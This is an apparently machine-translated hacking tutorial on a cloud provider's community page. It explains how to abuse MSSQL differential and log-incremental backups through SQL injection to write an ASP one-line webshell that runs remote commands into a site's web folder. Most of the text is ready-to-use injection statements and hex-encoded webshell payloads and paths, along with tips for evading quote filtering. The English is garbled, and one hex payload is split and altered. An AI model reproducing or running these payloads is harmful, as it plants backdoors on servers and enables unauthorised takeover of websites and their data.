MSSQL differential backup, is compared with the previous backup, the different content back down, so that, as long as the previous backup, insert new content, differential backup can be just inserted content back up, and this backup file will be greatly reduced, get Webshell success also improved a lot!
The process of differential backup is probably this:
1. Full backup once (save location can certainly be changed)
Backup Database library name to disk = ' C:\ddd.bak ';--
2. Create a table and episode into data
CREATE TABLE [dbo]. [Dtest] ([cmd] [image]);
Insert into dtest (cmd) values (0x3c25657865637574652872657175657374282261222929253e);--
3. Make a differential backup
Backup Database library name to disk= ' target location \d.asp ' with differential,format;--
Above
0x3c25657865637574652872657175657374282261222929253e
It's a word. Trojan content: <%execute (Request ("a"))%>
The following is a common online differential backup code, the same idea!
===================================================
Using differential backup to improve the success rate of Backupwebshell and reduce file size
Steps:
DECLARE @a sysname,@s nvarchar (4000) Select @a=db_name (), @s=0x77006f006b0061006f002e00620061006b00 Backup Database @a To Disk=@s
CREATE TABLE [dbo]. [Xiaolu] ([cmd] [image]);
Insert into Xiaolu (cmd) VALUES (0x3c25657865637574652872657175657374282261222929253e)
DECLARE @a sysname,@s nvarchar (4000) Select @a=db_name (), @s= 0x65003a005c007700650062005c0077006f006b0061006f002e00610073007000 Backup Database @a to disk=@s with DIFFERENTIAL, FORMAT
0x77006f006b0061006f002e00620061006b00 for Wokao.bak
0X3C25657865637574652872657175657374282261222929253E is <%execute (Request ("a"))%>
0x65003a005c007700650062005c0077006f006b0061006f002e00610073007000 is e:\web\wokao.asp.
Statement: The method is not what I think, I just write tools, the default get Shell is
<%execute (Request ("a"))%>
===============================================================
I found the code above, sometimes ineffective, and directly using the
Backup Database library name to disk = ' C:\ddd.bak '
Backup Database library name to disk= ' target location \d.asp ' with differential,format;--
But can succeed, so the most original way to write out! The thought is created by the predecessors, this does not say everybody also knows!
Library name must be valid library name, General injection tool can get! If a station filter "'", it is necessary to convert the character content to the value!
There are log incremental backups on the web, and I'll record him.
=====================================================
Another log incremental backup technology:
' ALTER DATABASE null set RECOVERY full--
'; Create table cmd (a image)--
'; BACKUP log null to disk = ' f:\cmd ' with init--
'; insert into cmd (a) VALUES (0x3c2565786563757465287265717565737428226122292
9253EDA)--
'; BACKUP log null to disk = ' backup path '--
ps:0x3c2565786563757465287265717565737428226122292
9253EDA is a word pony 16 into the system
When it comes to a horse, there are several ways to do it:
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
